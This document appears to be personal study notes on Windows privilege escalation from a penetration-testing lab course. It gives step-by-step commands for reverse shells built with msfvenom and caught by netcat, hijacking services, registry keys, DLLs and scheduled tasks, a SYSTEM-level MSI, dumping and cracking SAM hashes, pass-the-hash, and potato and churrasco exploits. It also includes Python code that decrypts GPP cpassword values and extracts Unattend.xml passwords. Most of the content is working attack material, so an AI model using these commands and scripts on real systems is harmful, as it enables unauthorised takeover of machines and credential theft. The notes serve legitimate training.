3 PrivEsc

Priority

LOLBAS (Living Off The Land Binaries and Scripts)

General:

Strategy:

  • Don't chase your first finding

  • Look over the enumeration

  • Make notes from winPEAS

  • Avoid Rabbit holes

  • An exploitable service you can reconfigure but cannot stop/start is not much use: nothing triggers the new binary short of a reboot

  • Take a look around for interesting files

    • C:\

    • C:\Program Files

  • Look for easy-steps first:

    • Registry Exploits

    • Services

    • Admin Processes

    • Get versions and search exploit

  • No admin?

    • Don't panic. Keep practicing.

    • Go back through your enum results

PrivEsc Class

Perms

  • User Accounts

    • Logon rights

    • files/folders/desktop/etc

  • Service Accounts

    • SYSTEM is highest priv of any local acct

    • You cannot log on interactively as these accounts

    • Also: network service, local service

  • Perms are controlled by ACL

    • Access Control List

    • user/group/svc/registry/etc

Misconfigs

  1. Insecure Service Properties

  2. Unquoted Service Path

  3. Weak Registry Permissions

  4. Insecure Service Executables

  5. DLL Hijacking

Best Practices:

  • Use an allow-list of permitted commands rather than a deny-list

  • Use a pager like 'most' instead of less/more (both can spawn a shell with !)

  • Avoid allowing programming languages

  • or harden them: block pty(), system(), exec()

smbserver.py

locate smbserver.py
cd /usr/share/doc/python3-impacket/examples/
sudo python3 ./smbserver.py -smb2support share /tmp    ..-smb2support: modern Windows will not talk SMB1

Unquoted Paths

C:\Program Files\OpenVPN\openvpn.exe    ..bad: unquoted and contains spaces
"C:\Program Files\VMWare\vmtoolsd.exe"  ..good: quoted
C:\Program.exe  ..if we can write this, the service runs it with the service's privileges!!

Passwords: Unattended Install Files

Unattend.xml

C:\Windows\System32\
C:\Windows\System32\sysprep\
C:\Windows\Panther\
C:\Windows\Panther\Unattend\

Found:
<LocalAccount>
<Value> U0VDNTk5IFJPQKET== </Value>  ..base64 !!!

echo U0VDNTk5IFJPQKET== | base64 -d
Flag!!

Caveat: sysprep-generated values decode to UTF-16LE with the literal word "Password" appended; strip it:
echo <value> | base64 -d | iconv -f UTF-16LE -t UTF-8 | sed 's/Password$//'

Passwords: Group Policy Prefs (GPP)

  • GPP was used to push the 'default' local admin password via Groups.xml in SYSVOL

  • The cpassword value is AES-encrypted with a key Microsoft itself published; old and patched (MS14-025) but the XML files are often still lying around

> findstr /S /I cpassword %LOGONSERVER%\sysvol\*.xml

Metasploit:

MSF > use post/windows/gather/credentials/gpp   ..pulls, extracts and decrypts

Domain:

Map the Domain controller SYSVOL share
> net use z: \\dc01\SYSVOL

Find the GPP file: Groups.xml
> cd z:
> dir /s Groups.xml

Review the contents for passwords
> type Groups.xml

gpp-decrypt

gpp-decrypt riBZpPtHOGtVk+SdLOmJ6xiNgFH6Gp45BoP3I6AnPgZ1IfxtgI67qqZfgh78kBZB
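An added example (not part of the page): a Python sweep of a copied SYSVOL tree that does what the findstr line and gpp-decrypt do together. It walks every .xml file, pulls each cpassword attribute with the account it belongs to, and decrypts it with the AES-256 key Microsoft published. Assumptions: the sample Groups.xml below is constructed (only the cpassword string is the one from the page), the fake SYSVOL tree is written to a temp directory, and decrypt_cpassword needs the third-party 'cryptography' package (everything else is standard library).

```python
"""
Added example (not from the page): findstr-style sweep of a SYSVOL copy for
GPP cpassword values, plus the decryption step gpp-decrypt performs.
"""
import base64
import os
import tempfile
import xml.etree.ElementTree as ET

# AES-256 key from Microsoft's own GPP documentation: "encrypted" in name only
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)

# Constructed sample Groups.xml (only the cpassword string comes from the page)
SAMPLE_GROUPS_XML = b"""<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="Administrator (built-in)" changed="2015-05-06 21:16:01">
    <Properties action="U" newName="" fullName="" description=""
        cpassword="riBZpPtHOGtVk+SdLOmJ6xiNgFH6Gp45BoP3I6AnPgZ1IfxtgI67qqZfgh78kBZB"
        changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
        subAuthority="RID_ADMIN" userName="Administrator (built-in)"/>
  </User>
</Groups>
"""


def extract_cpasswords(xml_data, source="<inline>"):
    """Every element carrying a cpassword attribute. Groups.xml uses userName,
    Services.xml uses accountName, ScheduledTasks.xml uses runAs."""
    hits = []
    for elem in ET.fromstring(xml_data).iter():
        cp = elem.get("cpassword")
        if cp:
            hits.append({
                "file": source,
                "user": elem.get("userName") or elem.get("accountName") or elem.get("runAs") or "",
                "newName": elem.get("newName", ""),
                "cpassword": cp,
            })
    return hits


def walk_sysvol(root_dir):
    """Equivalent of findstr /S /I cpassword <sysvol>\\*.xml, returning parsed hits."""
    hits = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    hits.extend(extract_cpasswords(fh.read(), path))
            except (ET.ParseError, OSError):
                continue  # not every XML under SYSVOL is a GPP file
    return hits


def pad_cpassword(cpassword):
    """GPP strips the '=' padding; restore it before base64-decoding."""
    return cpassword + "=" * (-len(cpassword) % 4)


def decrypt_cpassword(cpassword):
    """What gpp-decrypt does: AES-256-CBC with the published key, all-zero IV,
    PKCS#7 padding, UTF-16LE plaintext. Needs the 'cryptography' package."""
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    ciphertext = base64.b64decode(pad_cpassword(cpassword))
    decryptor = Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(b"\x00" * 16)).decryptor()
    plaintext = decryptor.update(ciphertext) + decryptor.finalize()
    plaintext = plaintext[: -plaintext[-1]]  # strip PKCS#7 padding
    return plaintext.decode("utf-16-le")


def demo_walk():
    """Write the constructed Groups.xml into a fake SYSVOL tree and sweep it."""
    with tempfile.TemporaryDirectory() as sysvol:
        gpp_dir = os.path.join(sysvol, "corp.local", "Policies", "{GUID}",
                               "Machine", "Preferences", "Groups")
        os.makedirs(gpp_dir)
        with open(os.path.join(gpp_dir, "Groups.xml"), "wb") as fh:
            fh.write(SAMPLE_GROUPS_XML)
        return walk_sysvol(sysvol)


if __name__ == "__main__":
    for hit in demo_walk():
        print(hit["file"], hit["user"], hit["cpassword"])
        print("  decrypts to:", decrypt_cpassword(hit["cpassword"]))
```

Point a mapped SYSVOL (z:\ from the net use above) at walk_sysvol to get the same result against a real domain; the zero IV and the fixed key are why every cpassword in every domain decrypts with the same command.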

Enable SMB v1

  • Just to prep your lab

  • v1 is a really bad idea: EternalBlue (MS17-010) exploitable!

Powershell as Admin:

PS> Get-WindowsOptionalFeature -Online -FeatureName "SMB1Protocol"   ..check current state
PS> Enable-WindowsOptionalFeature -Online -FeatureName "SMB1Protocol-Client" -All

Reboot when prompted, or via the GUI:
PS> optionalfeatures.exe
.. SMB 1.0/CIFS File Sharing Support
.. SMB Direct
Ok

Basic Venom Reverse Shell:

msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=53 -f exe -o reverse.exe
nc -nvlp 53

c:\PrivEsc> copy \\192.x.kali\tools\reverse.exe .    ..UNC path: two leading backslashes
c:\PrivEsc> .\reverse.exe

RDP Trick

> net user
> net user mikes hacks /add
> net localgroup administrators mikes /add

Allow Remote Access:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Kali:
> sudo apt-get update
> sudo apt-get install rdesktop
> rdesktop -u mikes -p hacks legacy      ..legacy = target hostname/IP
> xfreerdp /u:mikes /p:hacks /v:legacy   ..if rdesktop refuses NLA

psexec

Escalate from admin to SYSTEM https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

From an admin shell, run the reverse shell as SYSTEM (-s) and catch it on Kali:

> PsExec64.exe -accepteula -i -s C:\PrivEsc\reverse.exe
> PsExec64.exe -accepteula -i -u "nt authority\local service" reverse.exe   ..drops to LOCAL SERVICE instead (lab prep for PrintSpoofer / potato)
> psexec64 \\COMPUTERNAME -u Test -p test -h "c:\users\public\nc.exe -nc 10.x.x.x 4444 -e cmd.exe"   ..-h: run with the account's elevated token

Kernel Exploits from Sysinfo

  • Method: systeminfo > wes.py > CVE > compiled exploit > shell

cd C:\Temp
systeminfo > sys.txt
C:> systeminfo > \\192.x.x.x\share\sys.txt     ..or write straight to the Kali share

curl -k "https://raw.githubusercontent.com/bitsadmin/wesng/master/wes.py" > ./wes.py
python wes.py --update                          ..fetch the definitions first
python wes.py ./sys.txt -i 'Elevation of Privilege' --exploits-only | more
python wes.py ./sys.txt -s critical -i "Remote Code Execution"

  • Look up results (exploit-db, precompiled binaries on GitHub)

  • PrivEsc:

    • Kali: listener: nc -nvlp 53

    • Windows: run the exploit, passing it the program to execute (ie: rev shell)

    • c:\PrivEsc\cve-2018-8120-x64.exe C:\PrivEsc\reverse.exe

    • Kali - Connected!!

Services

  • We can exploit.. If they are running with SYSTEM privs and are misconfigured

sc.exe qc myserv                  ..query config
sc.exe query myserv               ..query status
sc.exe config myserv option= xyz  ..modify (sc needs the space after '=')
net start/stop myserv             ..start/stop

Service: Modify

  • Repoint the service executable (binpath) at our reverse shell

  • You must be able to stop/start the service for the change to take effect

  • Otherwise force a reboot, if you have the right to

---------------------------
Service Issues:
./winPEASany.exe quiet servicesinfo 
cat winpeas-services.txt

Found: 
daclsvc - "you can modify this service"

Verify: 
accesschk.exe /accepteula -uwcqv user daclsvc 
Found: SERVICE_CHANGE_CONFIG, SERVICE_START, SERVICE_STOP

sc qc daclsvc      ..svc path & detail 
sc query daclsvc   ..currently stopped

---------------------------
Exploit:
Change binpath to our reverse-shell 
sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""

kali: nc -nvlp 53
net start daclsvc
whoami system!!

Service: Unquoted Path

  • Unquoted paths containing spaces are ambiguous

  • Windows appends .exe to each space-separated prefix and tries them in order (whoami.exe ..same as: whoami)

  • Example:

    • C:\Program Files\Some Dir\SomeProgram.exe

  • Could be:

    • "C:\Program.exe" with "Files\Some Dir\SomeProgram.exe" as argument

    • "C:\Program Files\Some.exe" with "Dir\SomeProgram.exe" as argument

  • Windows tries each candidate in turn and runs the first one it finds
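An added example (not from the page) that covers both the Unquoted Paths note above and this section: given the BINARY_PATH_NAME from `sc qc`, it lists the executables Windows would try, in order, before reaching the real binary, and the directories you then need write access to (the ones to feed to accesschk -uwdq). The `sc qc` output below is a constructed sample that mirrors the lab service on the page; parse_sc_qc and assess_service are names chosen here.

```python
"""
Added example (not from the page): enumerate the hijack candidates behind an
unquoted service path, the way CreateProcess resolves it.
"""
import ntpath
import re

# Constructed sample of `sc qc unquotedsvc` output for the lab service on the page
SAMPLE_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: unquotedsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Unquoted Path Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""


def parse_sc_qc(output):
    """Pull the KEY : VALUE pairs out of `sc qc <svc>` output."""
    fields = {}
    for line in output.splitlines():
        m = re.match(r"^\s*([A-Z_]+)\s*:\s*(.*?)\s*$", line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def unquoted_path_candidates(image_path):
    """Paths CreateProcess tries, in order, before the real binary of an
    unquoted ImagePath that contains spaces. Empty list = not ambiguous."""
    cmd = image_path.strip()
    if not cmd or cmd.startswith('"'):
        return []                      # quoted path: no ambiguity
    candidates = []
    prefix = ""
    for token in cmd.split():
        prefix = token if not prefix else prefix + " " + token
        if prefix.lower().endswith(".exe"):
            break                      # this prefix is the real binary; the rest are its arguments
        candidates.append(prefix + ".exe")
    return candidates


def plant_locations(candidates):
    """Directory you need write access to for each candidate (check with accesschk -uwdq)."""
    return sorted({ntpath.dirname(c) for c in candidates}, key=len)


def assess_service(sc_qc_output):
    """Combine the config with the path analysis into one verdict."""
    f = parse_sc_qc(sc_qc_output)
    cands = unquoted_path_candidates(f.get("BINARY_PATH_NAME", ""))
    return {
        "service": f.get("SERVICE_NAME"),
        "runs_as": f.get("SERVICE_START_NAME"),
        "candidates": cands,
        "dirs_to_check": plant_locations(cands),
        "interesting": bool(cands),
    }


if __name__ == "__main__":
    verdict = assess_service(SAMPLE_SC_QC)
    print(verdict["service"], "runs as", verdict["runs_as"])
    for c in verdict["candidates"]:
        print("  would try:", c)
    for d in verdict["dirs_to_check"]:
        print("  need write on:", d)
```

Note that every space produces a candidate, so "C:\Program Files\Unquoted Path.exe" is tried too; the page's exploit drops Common.exe because "C:\Program Files\Unquoted Path Service\" was the first directory BUILTIN\Users could write to.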

---------------------------
winPEAS 
Found: Unquotedsvc 
C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe

Verify we can edit: 
accesschk.exe /accepteula -uwcqv user unquotedsvc 
Found: SERVICE_START, SERVICE_STOP

Can we edit the Binary?
accesschk.exe /accepteula -uwdq C:\                                           ..-d: directories, not services
accesschk.exe /accepteula -uwdq "C:\Program Files\"
accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"

Found! 
BUILTIN\Users  ..allowed RW 
C:\Program Files\Unquoted Path Service\

---------------------------
Exploit: 
C:\Program Files\Unquoted Path Service\Common.exe 
copy reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"

kali listener: nc -nvlp 53
net start unquotedsvc
whoami system!!

Service: Exec Swap

  • If "myservice.exe" is modifiable, we can just replace it!

  • Be sure to make a backup, in prod

---------------------------
winPEAS 
filepermsvc .."File Permissions: Everyone [AllAccess]"

Verify:
.\accesschk.exe /accepteula -uvwq "C:\Program Files\File Permissions Service\filepermservice.exe"   ..(-k is for registry keys, not files)
.\accesschk.exe /accepteula -uvqc filepermsvc

Found:
Can read/write
Can start/stop

Backup 
copy "C:\Program Files\File Permissions Service\filepermservice.exe" C:\Temp

---------------------------
Exploit:
copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe"

kali listener: nc -nvlp 53
net start filepermsvc
whoami system!!

Registry: Weak Perms

  • Registry keeps detail for each service.

  • ACL is bad = we can edit the registry.

  • Even if the service cant be modified.

  • We can update the registry of a service that has 'system' and point to our reverse

---------------------------
winPEAS
Found 'regsvc' can be modified in registry

Verify:
powershell -exec bypass
ps> Get-Acl HKLM:\System\CurrentControlSet\Services\regsvc | Format-List
ps> .\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc   ..accesschk and reg.exe take HKLM\ (HKLM:\ is only the PowerShell drive)

Confirmed:
RW - NT Authority\INTERACTIVE ..meaning us!

Can we start the service? 
ps> .\accesschk.exe /accepteula -ucqv user regsvc 
SERVICE_START, SERVICE_STOP ..yes!

---------------------------
Plan:
Repoint the Registry to our 'reverse':
reg query HKLM\System\CurrentControlSet\Services\regsvc
.. ImagePath says: C:\Program Files... insecureregistryservice.exe
.. ObjectName: LocalSystem ..SYSTEM privs

---------------------------
Exploit:
reg add HKLM\System\CurrentControlSet\Services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f

kali listener: nc -nvlp 53
net start regsvc
whoami system!!

Registry: AutoRuns

Could be useful, but slow: a Run key entry only fires when someone logs on, so you wait for an admin logon (or a reboot)

winPEASany.exe quiet applicationsinfo

Autorun Applications ..Found!
C:\Program Files\Autorun Program\program.exe
FilePerms: Everyone ..yikes

Manually check for AutoRuns:
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
found!

Verify, can we write to it?
accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"
RW Everyone ALL_ACCESS

Backup the .exe
copy "C:\Program Files\Autorun Program\program.exe" C:\Temp

Overwrite the .exe
copy /Y reverse.exe "C:\Program Files\Autorun Program\program.exe"
kali listener: nc -nvlp 53

HKLM Run entries execute at logon, as whichever user logs on. So line up an admin logon:
windows: restart
windows: login as admin
whoami admin!

DLL Missing Hijack

  • If a Service loads a DLL

  • The DLL runs inside the service process, with the service's privileges

  • If the DLL is missing, and we can write to a directory in its search path...

  • Then we can drop our evil DLL in that location!

  • Often a very MANUAL process to discover

  • In a real engagement: copy the .exe and analyze it (Procmon) in another environment

---------------------------
winPEAS 
Check for DLL Hijacking in PATH folders 
"C:\Temp" ..found writable and Path!
"dllsvc"  ..vulnerable to hijacking

Verify: 
.\accesschk.exe /accepteula -uvqc dllsvc 
Found: Can start/stop

sc qc dllsvc 
binary: "C:\Program Files\DLL Hijack Service\dllhijackservice.exe" 
runs as LocalSystem

---------------------------
Procmon DLL Watch

Windows:
Procmon64 (run as Admin)
Ctrl-X ..clear; Ctrl-L ..add filter: Process Name is "dllhijackservice.exe"
Optional filters: Result is "NAME NOT FOUND", Path ends with ".dll"
De-select registry
De-select show-network
Start Capture
cmd> net start dllsvc
lots of 'NAME NOT FOUND'
Also tries: "C:\Temp\hijackme.dll" ..which is writeable!

---------------------------
Exploit:
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=53 -f dll -o /tools/hijackme.dll
nc -nvlp 53
copy \\192.x.kali\tools\hijackme.dll C:\Temp
net stop dllsvc
net start dllsvc
whoami
system!!

MSI: Install Elevated

  • AlwaysInstallElevated: Windows Installer runs every .msi with SYSTEM privileges

  • Lets make a malicious MSI file that contains a reverse shell

  • Catch: Only works if AlwaysInstallElevated = 1 under BOTH keys:

    • HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

    • HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer

---------------------------
winPEASany.exe quiet windowscreds
Found: 
AlwaysInstallElevated set to 1 in HKLM 
AlwaysInstallElevated set to 1 in HKCU

Verify:
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
.. AlwaysInstallElevated = 1
.. Found!

---------------------------
Exploit: msi
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=53 -f msi -o /tools/reverse.msi
Catch with netcat or msf/multi
nc -nvlp 53
copy & Execute:
> copy \\192.x.kali\tools\reverse.msi C:\Temp
> msiexec /quiet /qn /i C:\Temp\reverse.msi
whoami
system!!

Passwords: Registry

  • Reused, Readable, or Insecure

  • Registry: Apps or Windows may store plaintext

Search Registry
Search for 'password' (noisy, too many results):
> reg query HKLM /f password /t REG_SZ /s
> reg query HKCU /f password /t REG_SZ /s

Enum:
> winPEASany.exe quiet filesinfo userinfo
Autologon user/pass ..Found!
Putty Sessions u/pw ..Found

Verify Reg:
> reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
> reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
user/pass Found!!

Kali:
> winexe -U 'admin%password123' //192.168.win cmd.exe
whoami admin!!

> winexe -U 'admin%password123' --system //192.168.win cmd.exe
whoami system!!

Passwords: stored creds: runas

  • Saved Creds with "runas"

  • You can runas 'admin'

> winPEASany.exe quiet cmd windowscreds
Stored Credentials - User: MyPc\admin ..Found

Confirm:
> cmdkey /list

Exploit:
> runas /savecred /user:admin C:\PrivEsc\reverse.exe
nc -nvlp 53
whoami
admin

Passwords: Search Configs

  • Unattend.xml file

  • To help install a pc, but passwords often left behind

---------------------------
Manual search:
recursive from current dir:
> dir /s *pass* == *.config
> findstr /si password *.xml *.ini *.txt

Try:
C:\Users\<user>
C:\Temp
C:\someapp\


---------------------------
Enumerate:
> winPEASany.exe quiet cmd searchfast filesinfo

Known files that can contain creds ..Found!
C:\Windows\Microsoft.NET\Framework...\web.config
C:\Windows\Panther\Unattend.xml

> type C:\Windows\Panther\Unattend.xml
found: user:pass (base64)

kali
echo "mybasexyz" | base64 -d
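An added example (not from the page) for this section and the Unattended Install Files section above: a parser that pulls every account/password pair out of an Unattend.xml. It handles the PlainText=true case, the lab-style base64 of plain text, and the sysprep convention where the base64 decodes to UTF-16LE of the password with the literal word "Password" appended. The answer file below is constructed (no real host data); the function names are chosen here.

```python
"""
Added example (not from the page): extract credentials from an Unattend.xml /
sysprep answer file, decoding the values the way Windows Setup stores them.
"""
import base64
import xml.etree.ElementTree as ET


def _local(tag):
    """Drop the urn:schemas-microsoft-com:unattend namespace prefix."""
    return tag.rsplit("}", 1)[-1]


def decode_unattend_value(value, plaintext):
    """Return the clear-text password for one <Value> element."""
    if plaintext:
        return value
    raw = base64.b64decode(value)
    text = None
    if len(raw) % 2 == 0:
        try:
            text = raw.decode("utf-16-le")
        except UnicodeDecodeError:
            text = None
    if text is not None and text.endswith("Password"):
        return text[: -len("Password")]     # sysprep convention: UTF-16LE(pw + "Password")
    return raw.decode("utf-8", "replace")   # lab-style: plain base64 of ASCII


def extract_unattend_passwords(xml_data):
    """Every Password/AdministratorPassword block, with the account it belongs to."""
    root = ET.fromstring(xml_data)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    found = []
    for elem in root.iter():
        kind = _local(elem.tag)
        if kind not in ("Password", "AdministratorPassword"):
            continue
        value, plaintext = "", False
        for child in elem:
            if _local(child.tag) == "Value":
                value = (child.text or "").strip()
            elif _local(child.tag) == "PlainText":
                plaintext = (child.text or "").strip().lower() == "true"
        if not value:
            continue
        owner = parent_of.get(elem)
        account = "Administrator" if kind == "AdministratorPassword" else ""
        if owner is not None:
            for sibling in owner:           # <Name> (LocalAccount) or <Username> (AutoLogon)
                if _local(sibling.tag) in ("Name", "Username"):
                    account = (sibling.text or "").strip()
        found.append({
            "context": _local(owner.tag) if owner is not None else "",
            "account": account,
            "password": decode_unattend_value(value, plaintext),
        })
    return found


def _b64(data):
    return base64.b64encode(data).decode()


# Constructed sample answer file: an AutoLogon with a sysprep-style encoded
# password, an AdministratorPassword left in PlainText, and a LocalAccount
# holding lab-style base64 of plain ASCII.
SAMPLE_UNATTEND = """<?xml version="1.0"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password><Value>{auto}</Value><PlainText>false</PlainText></Password>
        <Enabled>true</Enabled>
        <Username>svc_deploy</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword><Value>Winter2024!</Value><PlainText>true</PlainText></AdministratorPassword>
        <LocalAccounts>
          <LocalAccount>
            <Password><Value>{local}</Value><PlainText>false</PlainText></Password>
            <Group>Administrators</Group>
            <Name>admin</Name>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
""".format(auto=_b64("P@ssw0rd123Password".encode("utf-16-le")),
           local=_b64(b"lab-secret"))

if __name__ == "__main__":
    for hit in extract_unattend_passwords(SAMPLE_UNATTEND):
        print(hit["context"], hit["account"], hit["password"])
```

Run it against each of the four paths listed under Unattend.xml above; when a value decodes to something that looks like UTF-16 garbage, it was plain ASCII, and when `base64 -d` shows a trailing "Password", that word is Setup's padding, not part of the secret.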

Passwords: SAM

  • SAM - holds the local account password hashes

  • SYSTEM - holds the boot key needed to decrypt them

  • Both are locked while Windows is running

  • If you can read both (backups!), then you can extract the hashes

Located: C:\Windows\System32\config

Backups:
C:\Windows\Repair
C:\Windows\System32\config\RegBack

winPEAS
> winPEASany.exe quiet cmd searchfast filesinfo
Found SAM and SYSTEM in:
C:\Windows\Repair

Copy back to Kali:
> copy C:\Windows\Repair\SAM \\192.x.kali\tools\
> copy C:\Windows\Repair\SYSTEM \\192.x.kali\tools\

pwdump

  • Extract the Windows hashes from SAM + SYSTEM, then crack them

  • Get the latest creddump7

git clone https://github.com/Neohapsis/creddump7.git
cd creddump7

> python2 pwdump.py /tools/SYSTEM /tools/SAM
admin:500:<LM hash>:<NT hash>:::     ..output format: user:rid:LM:NT

crack admin (the NT hash is hashcat mode 1000)
hashcat -m 1000 --force myhashxyz123 /usr/share/wordlists/rockyou.txt
password123 ..Found!

Connect from Kali:
winexe -U 'admin%password123' --system //192.168.win cmd.exe
whoami system    ..(--system gives SYSTEM; drop the flag for a plain admin shell)

Pass the Hash

  • Use the hash instead of the password (NTLM authentication only needs the NT hash)

  • winexe ..normal

  • pth-winexe ..pass the hash: -U takes 'user%LMHASH:NTHASH'; the 'secondhalf' after the colon is the NT hash straight from pwdump

> pth-winexe -U 'admin%myhashxyz123:secondhalf' //192.x.win cmd.exe
whoami admin!!

> pth-winexe --system -U 'admin%myhashxyz123:secondhalf' //192.x.win cmd.exe
whoami system!!

Scheduled Tasks

  • If we can edit a current Scheduled Task

  • We can append our evil entry

---------------------------
View:
> schtasks /query /fo LIST /v
ps> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

cd C:\
cd DevTools  ..interesting folder
CleanUp.ps1  ..interesting file

type CleanUp.ps1

Note says
#Runs every minute
#Runs as System
Remove-Item C:\DevTools\*.log

---------------------------
perms:
accesschk.exe /accepteula -quv user CleanUp.ps1
File_Write

backup:
copy CleanUp.ps1 C:\Temp\

---------------------------
Exploit:
echo C:\PrivEsc\reverse.exe >> CleanUp.ps1     ..works because the path has no spaces; a path with spaces needs PowerShell's call operator: & "C:\path with spaces\reverse.exe"
nc -nvlp 53
Connected
whoami
system!!

GUI Admin Apps

  • AKA: "Citrix Method"

  • Same trick as breaking out of a Citrix/kiosk session: a GUI app running as admin hands you a file dialog

  • If an app is setup to run as Admin

  • You can use it to do other things too - like open a CMD!

Open: 
"AdminPaint" icon

View: 
tasklist /V | findstr mspaint.exe 
mspaint.exe ..with Admin.. Running

Exploit: 
AdminPaint > File > Open > 
file://c:/windows/system32/cmd.exe 
whoami:admin

Startup Apps

  • If we can edit, we can add:

  • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

  • When Admin logs in - it will execute as Admin !!

Kali-reversed:
> accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
Users have RW

vbscript to create a link to our reverse.exe
> type CreateShortcut.vbs
> cscript CreateShortcut.vbs  ..creates our reverse.lnk in the StartUp folder

kali:
nc -nvlp 53

Win:
Logout of Windows
Login as Admin.. to trigger our Startup Script

Kali: Connected
whoami
admin!!

Installed Apps

> tasklist /V
  • Is it exploitable?

  • www.exploit-db.com

  • Filter: local, windows search: priv esc

  • Examples:

    • KioWare Server.. weak file/service permissions

    • IObit .. unquoted service path

    • Iperius Backup .. file permissions

  • Other good ones:

    • Buffer Overflows

Hot Potato

  • Local NTLM spoofing/relay attack to get SYSTEM

  • Like: Responder, but local (NBNS spoof + WPAD + NTLM relay to a local service)

  • Works : Windows 7, 8, early 10 (patched by MS16-075)

  • Intercepts requests, spoofs, relays, runs our payload

One command line (shown split for readability):
> potato.exe -ip 192.x          ..windows target IP
  -cmd "C:\PrivEsc\reverse.exe" ..payload
  -enable_httpserver true
  -enable_defender true
  -enable_spoof true
  -enable_exhaust true

> kali: nc -nvlp 53
whoami system!

Potato

Potato Family

PrintSpoofer

Print Spooler Exploit https://github.com/itm4n/PrintSpoofer
Requires: SeImpersonatePrivilege (service accounts such as LOCAL SERVICE have it) and vc_redist.x64.exe (if not present)

Lab setup: drop to LOCAL SERVICE first
> PSExec64.exe /accepteula -i -u "nt authority\local service" C:\PrivEsc\reverse.exe
> whoami
local service

> whoami /priv
SeImpersonatePrivilege ..Enabled

kali> nc -nvlp 53
> PrintSpoofer.exe -i -c "C:\PrivEsc\reverse.exe"
> whoami
system

Metasploit: Looking Around

meterpreter > run post/windows/gather/win_privs
meterpreter > shell
C:\> cd \ & dir /b /s proof.txt
C:\> type c:\pathto\proof.txt

getsystem

Metasploit Meterpreter - genius! Won't work on patched, newer Windows boxes. Should NOT be relied on as the user > admin escalation method on modern systems: it already needs admin (or SeDebugPrivilege) to work

  • rapid7/metasploit-payloads

    • elevate.c

    • namedpipe.c

    • tokendup.c

3 techniques getsystem can use; it tries all 3 until one succeeds

  1. Named Pipe Impersonation (in memory): creates a named pipe, gets a SYSTEM service to connect to it, impersonates that token

  2. Named Pipe Impersonation (dropper): same, but writes a DLL to disk that runs as SYSTEM and connects to the pipe; limited to x86

  3. Token Duplication (in memory): requires SeDebugPrivilege; finds a SYSTEM process and injects a DLL that duplicates its token

churrasco

  • Token impersonation via churrasco, developed by Cesar Cerrudo ("Token Kidnapping")

  • Escalates privs to SYSTEM

  • Server 2003 allows Network Service and Local Service to impersonate 'System'

  • Patched by Microsoft in MS09-012 (April 2009)

  • On newer systems Juicy Potato works fine

  • But on older systems, token impersonation is abused via the churrasco exploit

  • If you have access to a box as nt authority\network service

  • IE: You managed to upload an ASP.NET shell

  • You can easily elevate your privileges on the box

  • You can download the exploit and compile it yourself

  • or you can use the one from sqlninja, located at /usr/share/sqlninja/apps/churrasco.exe

  • It's used by sqlninja when we have bruteforced the sa password

  • After uploading you can easily

  • After uploading you can easily

    • Elevate your privileges.

    • Create an Admin account

    ------------------------
    Share from Kali/smb:
    
    locate churrasco.exe
    wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
    cp /usr/share/sqlninja/apps/churrasco.exe /tmp
    cp /usr/share/sqlninja/apps/nc.exe /tmp
    msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.98 LPORT=5555 -f exe > /tmp/venomshell.exe
    
    locate smbserver.py
    cd /usr/share/doc/python3-impacket/examples/
    sudo python3 smbserver.py share /tmp
    nc -nvlp 5555
    
    
    ------------------------
    Windows:
    
    whoami /priv    ..SeImpersonatePrivilege - Yes!
    systeminfo      ..Server 2003 - Yes!
    
    cd C:\Windows\Temp
    copy \\10.x.x.x\share\nc.exe .
    copy \\10.x.x.x\share\venomshell.exe .
    copy \\10.x.x.x\share\churrasco.exe .
    
    > \\10.x.x.x\share\churrasco.exe -d whoami
    > churrasco.exe -d "net user <username> <password> /add"
